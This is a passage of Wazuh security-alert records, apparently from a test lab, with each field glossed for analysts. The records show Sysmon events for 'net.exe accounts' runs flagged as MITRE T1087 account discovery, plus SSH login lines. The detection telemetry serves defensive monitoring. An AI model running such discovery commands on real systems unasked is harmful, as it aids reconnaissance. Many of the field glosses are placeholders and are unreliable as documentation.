data.win.eventdata.hashes: SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-be5d-680a-1d0c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 16636 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\SysWOW64\\net.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: net.exe accounts No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Discovery activity executed Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92031 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1087'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Discovery'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Account Discovery'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 21 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534566.2259542 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:42:42.0654954Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 290736 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:42:42.059
ProcessGuid: {94294ddc-be62-680a-200c-000000000e00}
ProcessId: 8592
Image: C:\Windows\SysWOW64\net.exe
FileVersion: 10.0.26100.1882 (WinBuild.160101.0800)
Description: Net Command
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: net.exe
CommandLine: net.exe accounts
CurrentDirectory: C:\Program Files (x86)\ossec-agent\
User: NT AUTHORITY\SYSTEM
LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000}
LogonId: 0x3E7
TerminalSessionId: 0
IntegrityLevel: System
Hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883
ParentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00}
ParentProcessId: 3244
ParentImage: C:\Program Files (x86)\ossec-agent\wazuh-agent.exe
ParentCommandLine: "C:\Program Files (x86)\ossec-agent\wazuh-agent.exe"
ParentUser: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:42:42.059 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-be62-680a-200c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 8592 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\SysWOW64\\net.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.1882 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Net Command No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: net.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: net.exe accounts No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Program Files (x86)\\ossec-agent\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea7f-67fe-e703-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 3244 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe\" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 000 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: server1 Hostname of the source machine. Handy when matching with AD or your CMDB.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534566.2264775 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: 2025-04-24T22:42:45.773883+00:00 server1 sshd[3349]: pam_unix(sshd:session): session opened for user simba(uid=1000) by simba(uid=0) The complete raw log message before parsing – last‑resort truth for deep dives.
predecoder.program_name: sshd Process that originally wrote the log line (e.g., sshd, sudo).
predecoder.timestamp: 2025-04-24T22:42:45.773883+00:00 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
decoder.parent: pam Parent decoder used – for nested parsing.
decoder.name: pam Name of the Wazuh decoder that parsed this raw log.
data.srcuser: simba User on the originating host – watch for root / SYSTEM used remotely.
data.dstuser: simba(uid=1000) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.uid: 0 Numeric user ID – pairs with username when name missing.
location: /var/log/auth.log Which log source produced the event (e.g., sysmon, auditd).
agent.id: 000 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: server1 Hostname of the source machine. Handy when matching with AD or your CMDB.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534566.2265234 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: 2025-04-24T22:42:45.764776+00:00 server1 sshd[3349]: Accepted password for simba from 192.168.6.135 port 60874 ssh2 The complete raw log message before parsing – last‑resort truth for deep dives.
predecoder.program_name: sshd Process that originally wrote the log line (e.g., sshd, sudo).
predecoder.timestamp: 2025-04-24T22:42:45.764776+00:00 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
decoder.parent: sshd Parent decoder used – for nested parsing.
decoder.name: sshd Name of the Wazuh decoder that parsed this raw log.
data.srcip: 192.168.6.135 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.srcport: 60874 Source TCP/UDP port seen – can confirm outbound SMB / RDP, etc.
data.dstuser: simba No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: /var/log/auth.log Which log source produced the event (e.g., sysmon, auditd).
rule.description: Discovery activity executed Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92031 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1087'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Discovery'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Account Discovery'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 22 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534570.2265701 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:42:43.0819453Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 291045 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:42:43.074
ProcessGuid: {94294ddc-be63-680a-220c-000000000e00}
ProcessId: 8356
Image: C:\Windows\SysWOW64\net1.exe
FileVersion: 10.0.26100.1 (WinBuild.160101.0800)
Description: Net Command
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: net1.exe
CommandLine: C:\WINDOWS\system32\net1 accounts
CurrentDirectory: C:\Program Files (x86)\ossec-agent\
User: NT AUTHORITY\SYSTEM
LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000}
LogonId: 0x3E7
TerminalSessionId: 0
IntegrityLevel: System
Hashes: SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49
ParentProcessGuid: {94294ddc-be62-680a-200c-000000000e00}
ParentProcessId: 8592
ParentImage: C:\Windows\SysWOW64\net.exe
ParentCommandLine: net.exe accounts
ParentUser: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:42:43.074 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-be63-680a-220c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 8356 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\SysWOW64\\net1.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.1 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Net Command No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: net1.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: C:\\WINDOWS\\system32\\net1 accounts No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Program Files (x86)\\ossec-agent\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea7f-67fe-e703-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-be62-680a-200c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 8592 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\SysWOW64\\net.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: net.exe accounts No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Discovery activity executed Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92031 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1087'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Discovery'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Account Discovery'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 23 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534570.2270752 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:42:43.1334158Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 291050 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:42:43.130
ProcessGuid: {94294ddc-be63-680a-230c-000000000e00}
ProcessId: 10588
Image: C:\Windows\SysWOW64\net.exe
FileVersion: 10.0.26100.1882 (WinBuild.160101.0800)
Description: Net Command
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: net.exe
CommandLine: net.exe accounts
CurrentDirectory: C:\Program Files (x86)\ossec-agent\
User: NT AUTHORITY\SYSTEM
LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000}
LogonId: 0x3E7
TerminalSessionId: 0
IntegrityLevel: System
Hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883
ParentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00}
ParentProcessId: 3244
ParentImage: C:\Program Files (x86)\ossec-agent\wazuh-agent.exe
ParentCommandLine: "C:\Program Files (x86)\ossec-agent\wazuh-agent.exe"
ParentUser: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:42:43.130 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-be63-680a-230c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 10588 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\SysWOW64\\net.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.1882 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Net Command No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: net.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: net.exe accounts No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Program Files (x86)\\ossec-agent\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea7f-67fe-e703-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 3244 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe\" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Discovery activity executed Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92031 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1087'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Discovery'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Account Discovery'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 24 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534570.2275989 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:42:43.2449488Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 291053 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:42:43.238
ProcessGuid: {94294ddc-be63-680a-250c-000000000e00}
ProcessId: 12592
Image: C:\Windows\SysWOW64\net1.exe
FileVersion: 10.0.26100.1 (WinBuild.160101.0800)
Description: Net Command
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: net1.exe
CommandLine: C:\WINDOWS\system32\net1 accounts
CurrentDirectory: C:\Program Files (x86)\ossec-agent\
User: NT AUTHORITY\SYSTEM
LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000}
LogonId: 0x3E7
TerminalSessionId: 0
IntegrityLevel: System
Hashes: SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49
ParentProcessGuid: {94294ddc-be63-680a-230c-000000000e00}
ParentProcessId: 10588
ParentImage: C:\Windows\SysWOW64\net.exe
ParentCommandLine: net.exe accounts
ParentUser: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:42:43.238 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-be63-680a-250c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 12592 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\SysWOW64\\net1.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.1 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Net Command No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: net1.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: C:\\WINDOWS\\system32\\net1 accounts No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Program Files (x86)\\ossec-agent\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea7f-67fe-e703-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-be63-680a-230c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 10588 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\SysWOW64\\net.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: net.exe accounts No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: A net.exe account discovery command was initiated Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92039 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1087'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Discovery'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Account Discovery'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 9 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
